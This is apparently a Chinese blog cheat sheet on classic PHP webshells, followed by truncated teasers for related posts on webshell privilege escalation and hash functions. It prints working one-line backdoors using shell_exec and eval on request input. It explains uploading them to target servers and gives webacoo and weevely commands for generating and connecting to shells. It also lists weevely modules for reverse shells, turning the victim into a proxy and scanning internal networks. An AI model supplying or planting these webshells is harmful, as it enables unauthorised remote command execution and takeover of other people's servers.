php經典一句話:<?php echo shell_exec($_get['cmd']);?>
中國菜刀:
官網:www.maicaidao.co
原理:上傳一句話(<?php @eval($_post['我是密碼']);?>)至伺服器端,再用中國菜刀客戶端(圖形化介面)去連線伺服器
webacoo(kali):
特點:傳輸的資料報裹在cookie中,並非http包體內,起到一定繞過作用
原理:生成webshell,上傳至目標伺服器,再拿webacoo去連線該webshell,返回可以執行系統命令的shell
缺點:不可設定專屬連線密碼
生成webshell: webacoo -g -o a.php
連線webshell: webacoo -t -u
weevely(kali):
原理:生成webshell,上傳至目標伺服器,再拿weevely去連線該webshell,返回可以執行系統命令的shell
生成webshell:weevely generate 密碼 a.php
連線webshell:weevely 密碼
特點:連線到目標伺服器webshell後還可以呼叫內建的n多模組,在shell下輸入help檢視模組,直接在shell下輸入模組名稱使用模組
30多個管理模組舉例:
1、執行系統命令、瀏覽檔案系統
2、檢查伺服器常見配置錯誤
3、建立正向、反向tcp shell連線
4、將目標伺服器作為**http伺服器(肉雞) ====>只需要在連線到的shell中輸入net_proxy即可開啟**,此時會在本地監聽127.0.0.1:8080,瀏覽器設定為該**後所有流量將走目標伺服器
5、從目標計算機執行埠掃瞄,滲透內網
幾種好用的經典webshell(php)
php經典一句話 中國菜刀 官網 www.maicaidao.co 原理 上傳一句話 至伺服器端,再用中國菜刀客戶端 圖形化介面 去連線伺服器 webacoo kali 特點 傳輸的資料報裹在cookie中,並非http包體內,起到一定繞過作用 原理 生成webshell,上傳至目標伺服器,再拿we...
9種經典的webshell提權方法
第一 如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便 也給了我們方便,到系統盤的documents and settings all us 破解就使用pcanywhere連線就ok了 第二 有很多小黑問我這麼把webshell的iis user許可權提公升 一般伺服器的管理都是本機...
幾種經典的hash演算法
計算理論中,沒有hash函式的說法,只有單向函式的說法。所謂的單向函式,是乙個複雜的定義,大家可以去看計算理論或者密碼學方面的資料。用 人 類 的語言描述單向函式就是 如果某個函式在給定輸入的時候,很容易計算出其結果來 而當給定結果的時候,很難計算出輸入來,這就是單項函式。各種加密函 數都可以被認為...